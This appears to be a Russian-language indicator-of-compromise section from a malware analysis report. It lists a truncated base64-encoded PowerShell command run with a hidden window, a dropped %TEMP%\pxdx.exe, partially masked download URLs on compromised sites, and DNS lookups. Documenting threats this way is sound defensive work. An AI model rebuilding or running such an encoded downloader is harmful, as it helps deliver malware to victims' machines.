Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAEcAWABYAFQAeABvAHMAPQAnAFYASwBOAFIAUgBhAGIAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAGAAUgBgAGkAYABUAGAAeQBwAFIAbwB0AE8AQwBvAEwAIgAgAD...
- %TEMP%\pxdx.exe
- %TEMP%\pxdx.exe
- http://am####tchell.com/themes/xJlzv0oI/
- http://st###arc.com/assets/WuwT30056/
- http://lo###akipci.com/wp-admin/qQlR04NcL/
- http://www.lo###akipci.com/wp-admin/qQlR04NcL/
- http://sh###einfo.com/wp-includes/J3946/
- http://www.sh###einfo.com/wp-includes/J3946/
- http://www.sc###ervenlo.nl/ww2015/U6HK1839/
- DNS ASK am####tchell.com
- DNS ASK st###arc.com
- DNS ASK lo###akipci.com
- DNS ASK sh###einfo.com
- DNS ASK sc###ervenlo.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAEcAWABYAFQAeABvAHMAPQAnAFYASwBOAFIAUgBhAGIAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAGAAUgBgAGkAYABUAGAAeQBwAFIAbwB0AE8AQwBvAEwAIgAgAD...' (со скрытым окном)